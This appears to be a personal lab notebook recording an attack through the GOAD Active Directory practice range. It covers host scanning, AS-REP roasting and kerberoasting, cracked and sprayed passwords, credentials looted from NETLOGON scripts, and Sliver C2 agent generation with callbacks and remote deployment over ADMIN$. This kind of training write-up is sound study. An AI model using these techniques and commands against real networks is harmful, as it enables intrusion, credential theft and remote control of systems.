## Outcomes - Find an initial vulnerable target - Map out infrastructure, domains, machines, DCs ## Parked Ideas - Dump SYSVOL for `samwell.tarly` - start doing bloodhound - `sansa.stark` hash from kerberoasting is currently unused - ditto for `sql_svc` - take a look at the encrypted secret at: `/targets/goad/north-sevenkingdoms-local/users/arya.stark/loot` ## Recon ### Initial Host ping ``` ╭─[λ]-[/targets/goad]-[] ╰─> nmap -sn 192.168.56.0/24 Starting Nmap 7.93 ( https://nmap.org ) at 2025-03-16 07:17 EDT Nmap scan report for 192.168.56.10 Host is up (0.050s latency). Nmap scan report for 192.168.56.11 Host is up (0.042s latency). Nmap scan report for 192.168.56.12 Host is up (0.042s latency). Nmap scan report for 192.168.56.22 Host is up (0.050s latency). Nmap scan report for 192.168.56.23 Host is up (0.050s latency). Nmap scan report for 192.168.56.100 Host is up (0.041s latency). Nmap done: 256 IP addresses (6 hosts up) scanned in 3.89 seconds ``` ### Netexec host enumeration Mostly interested in gaining intel on hostnames etc here. ![[Pasted image 20250316122023.png]] ### Users ![[Pasted image 20250316124339.png]] ``` sanwell.tarly:Heartsbane ``` ## `samwell.tarly` - [x] check winrm access - [ ] dump sysvol share - [x] rid-brute - yields additional users, appended to `users.txt` #### Shares ![[Pasted image 20250316124909.png]] Possibly IPC share? ### [[AS-REP Roasting]] ``` [email protected]:091f436960574731490f1169c3a2c449$e0290aedf2a6c743ea31e8b705fe09920b9db61083d494c6c7cd323d718e137c4d193949781110e42aa296140a3949a380d35cde3df61136277f526d4ef650553d758e12d5aff3f1c09e356c29179c9d85ae18a1117adf71faf5ac4424d6e2909a44517b3ea39b5b8006ce0fb252b232a1e0f67cdaf4740ba1e1a35132e3f4cffb9498a7be5db716c5e2e489e752c6be5e9f227060bbfe69ddebb4279b06022c79adc1508940d4587f899792e528e5170d08f3c66a38f77016cc2c18dc0a4b40ea533c456cc285f5d3a44f0e1f8aca477db6f0072eee9b1b0696cb07a6062116d9d0d8f45744ab3ad24639bfd0df57c58f84998284273f7118ccf6d3ab6249121dabeca589f7 ``` ## `brandon.stark` Asrep roasting + cracking yields password: `iseedeadpeople`. - [ ] SMB - [ ] Check SYSVOL - [x] winrm - no love - has public READ,WRITE on castblack SMB - permission denied for PUT and listing - this indicates that NTFS file system ACLs don't grant us access at all - kerberoasting yields a ton of hashes - one cracks for `jon.snow:iknownothing` ## `jon.snow` - no winrm - SMB - `all` share w. `R:W` - `public` share w. `R:W` on Castleblack - `smbclient //castleblack/all -U jon.snow%iknownothing` - reveals `arya.txt` ``` ╭─[λ]-[/targets/goad/north-sevenkingdoms-local]-[] ╰─> cat arya.txt Subject: Quick Departure Hey Arya, I hope this message finds you well. Something urgent has come up, and I have to leave for a while. Don't worry; I'll be back soon. I left a little surprise for you in your room – the sword You've named "Needle." It felt fitting, given your skills. Take care of it, and it'll take care of you. I'll explain everything when I return. Until then, stay sharp, sis. Best, John# ``` We'll append `Needle` to our `passwords.txt` and rerun the password spray. - we get a hit on `winterfell` for `arya.stark:Needle` ## `arya.stark` - SMB - no interesting shares (SYSVOL) - can read NETLOGON share on [[winterfell]] - winrm - no love ### Dumping [[SMB Share - NETLOGON]] Share contains: - `script.ps1` - `secret.ps1` ``` ╭─[λ]-[/targets/goad/north-sevenkingdoms-local/users/arya.stark/loot]-[] ╰─> cat script.ps1 # fake script in netlogon with creds $task = '/c TODO' $taskName = "fake task" $user = "NORTH\jeor.mormont" $password = "_L0ngCl@w_" # passwords in sysvol still ...# ╭─[λ]-[/targets/goad/north-sevenkingdoms-local/users/arya.stark/loot]-[] ╰─> cat secret.ps1 # cypher script # $domain="sevenkingdoms.local" # $EncryptionKeyBytes = New-Object Byte[] 32 # [Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes($EncryptionKeyBytes) # $EncryptionKeyBytes | Out-File "encryption.key" # $EncryptionKeyData = Get-Content "encryption.key" # Read-Host -AsSecureString | ConvertFrom-SecureString -Key $EncryptionKeyData | Out-File -FilePath "secret.encrypted" # secret stored : $keyData = 177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247, 41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91 $secret="76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA=" # T.L.# ``` Next steps: - password spray with new pass - crack the stored secret - password spray again (keep in mind account lockout) Password spraying yields: - `jeor.mormont:_L0ngCl@w_` ## `jeor.mormont` ![[Pasted image 20250316200928.png]] looks like we are getting into [[castleblack]] now <3 dude got READ,WRITE on [[SMB Share - ADMIN$]] indicating that he's a member of the Administrators group (makes sense lore wise). Next up: - Remote access shell - Potentially dump payload into smb share (sliver?) and execute it using psexec or similar - Start dumping lsass, mimikatz all that stuff - keep in mind windows defender is disabled on this one - can authenticate using `nxc winrm ...` but can't execute commands - evilwinrm dosent yield a shell either, just kinda hangs until it times out ### Setting up Sliver - we be piping all our traffic through the jumpbox. - ie. our sliver server will be behind the jumpox. - so how does the sliver agents actually reach the sliver server? - one option is to create a tcp pivot agent and deploy it on the jump box - have subsequent agents connect to that foca - alternatively we may be able to use the wireguard agents somehow??? - another option is to figure out how to leverage the jumpboxs wireguard server to route the c2 traffic back to us? - setup TCP listener on the jumpbox host, seems cleanest - gen payload for jumpbox (linux) - make sure to use the wireguard network IP for callback - gen payload for [[castleblack]], windows, use `generate --tcp-pivot $INTERNAL_JUMPBOX_ADDRESS` **Generating the jumpbox agent** ``` generate --os linux --skip-symbols --http 10.13.13.2 --name jumpbox ``` **Transfer to jumpbox** ``` scp -i /root/GOAD/workspace/02a4df-goad-azure/ssh_keys/ubuntu-jumpbox.pem ./jumpbox [email protected]:/home/goad/agent ``` **Generate payload for [[castleblack]]** ``` generate --os windows --tcp-pivot 192.168.56.100 --name castleblack ``` **Deploy payload to [[castleblack]] via [[SMB Share - ADMIN$]]**: ```sh nxc smb castleblack -u jeor.mormont -p '_L0ngCl@w_' --put-file /targets/goad/agents/castleblack.exe \\Windows\\Temp\\agent.exe ``` Hit a snag here, payload is too big (1.4 MB). This leaves me with the following options: - Reduce payload size (use `--skip-symbols`) - no love - Upload a dropper `.ps1` - Execute said dropper using psexec - Then execute the paylaod - Manually execute a curl/wget command via psexec to download the agent - this requires me to either host the payload on the jumpbox - or use reverse port forwarding via the sliver agent which has been deploy to the jumbox. - or simply use ssh (reverse?) port forwarding (likely the simplest and cleanest approach) ## Lessons Learned - More AD related reps - Wireguard setup and configuration - More reps on pivoting and portforwarding - Reps on sliver c2 - Reps for kerberoasting, asreproasting and hash cracking - Developed a good note and file structure for larger AD engagements - Improved workflow - Started diagramming the attack path in obsidian canvas - Pivoting from broken [[Evil-WinRM]] to psexec - Learning the disadvantage of bulky sliver payloads (can't put directly onto SMB share) - Learning about the difference between SMB share and ACL file permissions - Ie. a file may be read write through SMB, but the actual file system permissions may prevent this